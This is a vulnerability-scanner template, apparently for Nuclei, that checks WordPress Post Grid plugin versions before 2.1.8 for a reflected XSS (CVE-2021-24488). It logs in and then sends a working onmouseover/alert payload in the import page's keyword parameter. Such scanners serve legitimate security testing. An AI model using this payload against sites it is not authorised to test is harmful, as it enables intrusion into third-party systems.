2022-02-08 01:07:19 +00:00
id: CVE-2021-24488

info:
  name: WordPress Plugin Post Grid < 2.1.8 - XSS
  author: cckuailong
  severity: medium
  description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
  reference:
    - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24488
    cwe-id: CWE-79
  tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin

requests:
  - raw:
      # Request 1: log in with the supplied credentials (the check is authenticated).
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      # Request 2: load the Post Grid import page with the keyword parameter set.
      - |
        GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    # Report a match only if the keyword value is reflected into the page and the response is 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="\"onmouseover=alert(document.domain)/">'
          - 'Post Grid'
        condition: and

      - type: status
        status:
          - 200